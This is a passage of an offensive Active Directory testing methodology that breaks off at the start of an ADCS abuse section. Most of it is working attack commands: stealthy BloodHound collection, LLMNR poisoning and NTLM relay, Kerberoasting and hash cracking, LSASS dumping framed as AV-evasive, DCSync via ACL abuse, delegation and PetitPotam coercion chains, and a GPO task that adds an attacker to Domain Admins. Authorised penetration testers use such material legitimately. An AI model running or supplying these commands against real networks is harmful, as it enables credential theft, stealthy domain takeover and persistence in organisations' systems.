offensive-active-directory

# Active Directory — Offensive Testing Methodology

## Quick Workflow

1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
2. Harvest creds via poisoning, Kerberoasting, ASREProast, or LSASS where allowed
3. Map attack paths to Domain Admin / Enterprise Admin / Tier 0
4. Execute path with lowest detection cost, validate at each hop
5. Establish persistence and document every action with timestamps

---

## Reconnaissance

### BloodHound Collection

```powershell
# SharpHound (CSharp collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip

# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth

# Bloodhound.py from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All
```

### PowerView (No Tool Drop)

```powershell
# Domain enumeration without binaries
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
  ?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}
```

### ADExplorer Offline

```
# Take snapshot from any low-priv user, analyze offline
ADExplorer.exe → File → Create Snapshot
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/
```

---

## Credential Harvesting

### LLMNR / NBT-NS / mDNS Poisoning

```bash
# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf

# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y
```

Crack with hashcat mode 5600. If cracking fails, relay instead.

### NTLM Relay

```bash
# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt

# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
  --escalate-user attacker --delegate-access

# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
  --adcs --template DomainController
```

### Kerberoasting

```powershell
# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
```

```bash
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule
```

### ASREProasting

```bash
# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt
```

### LSASS / SAM Dumping

```cmd
:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full

:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)

:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid
```

Parse with Mimikatz or pypykatz offline:

```bash
pypykatz lsa minidump lsass.dmp
```

---

## Privilege Escalation Within AD

### ACL Abuse

| Right | Abuse |
|-------|-------|
| `GenericAll` / `GenericWrite` | Add SPN → Kerberoast; reset password; add member |
| `WriteDacl` | Grant yourself DCSync rights, then DCSync |
| `WriteOwner` | Take ownership → grant rights → exploit |
| `AllExtendedRights` (User) | Force password change |
| `AllExtendedRights` (Domain) | DCSync |
| `AddMember` | Add self to privileged group |
| `WriteSPN` | Set SPN, kerberoast target |

```powershell
# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname

# Grant DCSync via WriteDacl
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' \
  -PrincipalIdentity attacker -Rights DCSync
```

### Kerberos Delegation

```powershell
# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap

# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator \
  /msdsspn:cifs/dc.corp.local /ptt

# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object
```

### Coercion Primitives

| Technique | Tool / RPC |
|-----------|-----------|
| PetitPotam | `MS-EFSRPC` (`EfsRpcOpenFileRaw`, `EfsRpcEncryptFileSrv`) |
| PrinterBug | `MS-RPRN` (`RpcRemoteFindFirstPrinterChangeNotificationEx`) |
| DFSCoerce | `MS-DFSNM` (`NetrDfsRemoveStdRoot`) |
| ShadowCoerce | `MS-FSRVP` |
| WebDAV | Search-and-replace UNC path embedded in any web fetch |

```bash
# Coerce + relay full chain
impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access &
PetitPotam.py -u low -p pass attacker-ip dc-ip
# Result: RBCD set, S4U → DA on coerced machine
```

### GPO Abuse

```powershell
# Find GPOs you can edit
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
  ?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid `
     -and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' }

# SharpGPOAbuse — add scheduled task / immediate task to GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System \
  --Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" \
  --GPOName "Workstation Policy"
```

---

## ADCS Abuse — ESC1 through ESC15

### Enumeration

```bash
certi